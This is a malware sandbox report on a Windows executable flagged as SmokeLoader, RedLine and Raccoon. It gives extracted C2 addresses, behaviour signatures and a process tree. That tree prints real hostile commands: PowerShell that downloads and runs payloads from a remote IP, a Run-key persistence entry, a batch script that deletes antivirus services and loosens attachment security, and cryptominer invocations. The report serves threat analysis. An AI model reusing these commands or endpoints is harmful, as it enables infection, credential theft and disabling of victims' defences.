Overview

overview

10

Static

static

506962077b...95.exe

windows7_x64

10

506962077b...95.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-08-2021 03:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    506962077b6d4f41f6879641bc8c8695.exe

  • Size

    319KB

  • MD5

    506962077b6d4f41f6879641bc8c8695

  • SHA1

    f2071382ba9d6eef51a56ca754247f669602440c

  • SHA256

    22c622082b1db75bb23f602ff64c49158d9740e63a0441abe52a47e2f961b57b

  • SHA512

    72cd80071468a9e893c6e434e81a0bf7c3ea4213e91b97ffb640fc5f6ae976b4332e0c27df0e290f8f008222f53d1248817add739f7a928fa8afd77f33ef1496

Score
10/10
raccoonredlinesmokeloader2ca2376c561d1af7f8b9e6f3256b06220a3db187471c70de3b4f9e4d493e418d1f60a90659057de0@gasfer_darkcd8dc1031358b1aec55cc6bc447df1018b068607backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

@gasfer_dark

C2

207.154.240.76:80

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon Stealer Payload 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 62 IoCs
  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 45 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe
    "C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe
      "C:\Users\Admin\AppData\Local\Temp\506962077b6d4f41f6879641bc8c8695.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1856
  • C:\Users\Admin\AppData\Local\Temp\C8A5.exe
    C:\Users\Admin\AppData\Local\Temp\C8A5.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-E04SA.tmp\C8A5.tmp" /SL5="$60050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\Users\Admin\AppData\Local\Temp\C8A5.exe
        "C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-0LF1Q.tmp\C8A5.tmp" /SL5="$70050,4193427,831488,C:\Users\Admin\AppData\Local\Temp\C8A5.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          PID:2160
          • C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
            "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:672
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4164
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4712
            • C:\ProgramData\Data\install.exe
              "C:\ProgramData\Data\install.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4728
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                PID:4828
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                PID:4872
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nWOVzGuqQJ.bat"
                  8⤵
                    PID:4296
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 65001
                      9⤵
                        PID:4176
                      • C:\Windows\SysWOW64\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:4228
                          • C:\Windows\System32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            10⤵
                              PID:4216
                          • C:\Windows\SysWOW64\mfvdsp\RuntimeBroker.exe
                            "C:\Windows\System32\mfvdsp\RuntimeBroker.exe"
                            9⤵
                            • Executes dropped EXE
                            PID:3932
                    • C:\ProgramData\Systemd\HostData.exe
                      NULL
                      6⤵
                      • Executes dropped EXE
                      PID:4804
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4820
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4884
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5012
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5108
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4200
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1600
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2244
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4240
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4344
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4424
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4056
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2124
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3200
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3408
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4448
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4524
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4592
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3948
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4028
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4568
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4632
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3848
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:1724
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4688
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3744
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2544
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4148
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4708
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:4764
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:1896
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:4916
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:5076
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2256
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:4060
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2168
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2024
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4016
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:4292
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:496
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:3876
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:640
                    • C:\ProgramData\Data\Database.exe
                      -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      PID:2172
          • C:\Users\Admin\AppData\Local\Temp\D6BF.exe
            C:\Users\Admin\AppData\Local\Temp\D6BF.exe
            1⤵
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            PID:3048
          • C:\Users\Admin\AppData\Local\Temp\DB64.exe
            C:\Users\Admin\AppData\Local\Temp\DB64.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\ProgramData\Runtimebroker.exe
              "C:\ProgramData\Runtimebroker.exe"
              2⤵
              • Executes dropped EXE
              • Drops startup file
              • Suspicious use of WriteProcessMemory
              PID:2276
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
                3⤵
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                PID:508
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
                3⤵
                • Blocklisted process makes network request
                PID:4232
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "powershell" Get-MpPreference -verbose
                  4⤵
                    PID:4480
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove 